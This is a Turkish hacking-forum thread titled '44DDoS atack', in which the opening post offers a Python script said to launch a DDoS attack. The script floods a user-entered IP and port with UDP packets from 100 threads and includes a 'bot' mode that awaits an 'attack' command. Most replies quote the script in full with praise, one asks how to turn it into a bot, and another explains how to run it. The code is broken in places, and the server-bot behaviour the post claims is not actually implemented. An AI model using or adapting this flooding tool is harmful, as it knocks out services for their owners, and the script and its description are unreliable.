44DDoS atack

admin44

Katılımcı Üye
6 Kas 2023
453
139
TÜRKİYE
Python:
import socket
import threading
import time

def ddos(ip, port, packet_count):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        for _ in range(packet_count):
            sock.sendto(b"", (ip, port))

def connect(ip, port):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, port))
        return sock

def send(sock, data):
    sock.sendall(data)

def main():
    ip = input("Hedef IP: ")
    port = int(input("Hedef Port: "))
    packet_count = int(input("Paket Sayısı: "))

    threads = []
    for _ in range(100):
        thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

def bot():
    ip = input("Sunucu IP: ")
    port = int(input("Sunucu Port: "))

    sock = connect(ip, port)
    send(sock, b"connect")

    while True:
        data = sock.recv(1024)
        if data == b"attack":
            send(sock, b"attack")
            time.sleep(1)

if __name__ == "__main__":
    if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
        main()
    else:
        bot()

Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
 
Moderatör tarafında düzenlendi:

Pdioxin

Üye
5 May 2023
61
11
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
eline sağlık
 

Proxq_

Üye
29 Mar 2023
91
31
Proxq_
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
bunu nasıl bot haline getireceğiz ?
 

Senior Beyaz

Katılımcı Üye
6 Mar 2016
470
136
root@beyaz:
Hangi Dosya üzerinden Yapacağım

bunu hangi dosyaya kaydedip nasıl açacağım*?
Merhabalar,
Verilen kodlar Python diline ait kodlardır. Yani VisualStudio Code aracınıda verlien kodları copy+paste yaptıktan sonra run butonu ile kaydedip çalıştırabilirsiniz. Program zaten otomatik olarak seçtiğiniz yere (örneğin masaüstü) dosyayı .py uzantılı olarak kaydedecektir. Verilen kodlar Windows kullanıyorsanız CMD komut sistemi üzerinden çalışacaktır. Çalıştırmadan önce Python'un bilgisayarınızda kurulu olduğundan emin olun.

İyi Forumlar...
 

Proxq_

Üye
29 Mar 2023
91
31
Proxq_
Merhabalar,
Verilen kodlar Python diline ait kodlardır. Yani VisualStudio Code aracınıda verlien kodları copy+paste yaptıktan sonra run butonu ile kaydedip çalıştırabilirsiniz. Program zaten otomatik olarak seçtiğiniz yere (örneğin masaüstü) dosyayı .py uzantılı olarak kaydedecektir. Verilen kodlar Windows kullanıyorsanız CMD komut sistemi üzerinden çalışacaktır. Çalıştırmadan önce Python'un bilgisayarınızda kurulu olduğundan emin olun.

İyi Forumlar...
teşekkürler
 

invisible blood

Uzman üye
15 Eyl 2023
1,177
443
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
Ellerinize sağlık.
 

H@cked BaBy

Basın&Medya Ekibi
28 Haz 2023
2,442
1,019
Arkana bak
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
Bunu genel kod olarak kod kutucuğuna koyup paylaşabilirsiniz.
 

Carbanak

Üye
3 Kas 2023
54
22
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
Elinize sağlık efendim.
 

Volkan.

Yeni üye
16 Kas 2023
20
4
import socket
import threading
import time

def ddos(ip, port, packet_count):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
for _ in range(packet_count):
sock.sendto(b"", (ip, port))

def connect(ip, port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, port))
return sock

def send(sock, data):
sock.sendall(data)

def main():
ip = input("Hedef IP: ")
port = int(input("Hedef Port: "))
packet_count = int(input("Paket Sayısı: "))

threads = []
for _ in range(100):
thread = threading.Thread(target=ddos, args=(ip, port, packet_count))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

def bot():
ip = input("Sunucu IP: ")
port = int(input("Sunucu Port: "))

sock = connect(ip, port)
send(sock, b"connect")

while True:
data = sock.recv(1024)
if data == b"attack":
send(sock, b"attack")
time.sleep(1)

if __name__ == "__main__":
if input("Sunucu mu yoksa bot mu olmak istiyorsunuz? (s/b): ") =
= "s":
main()
else:
bot()
Sunucu kodunu çalıştırarak bir DDoS saldırısı başlatabilirsiniz. Bot kodunu çalıştırarak bir bot oluşturabilir ve sunucu ile bağlantı kurabilirsiniz. Sunucu botlardan gelen bağlantıları kabul eder ve onlara saldırı başlatması için komut verir.
Eline sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.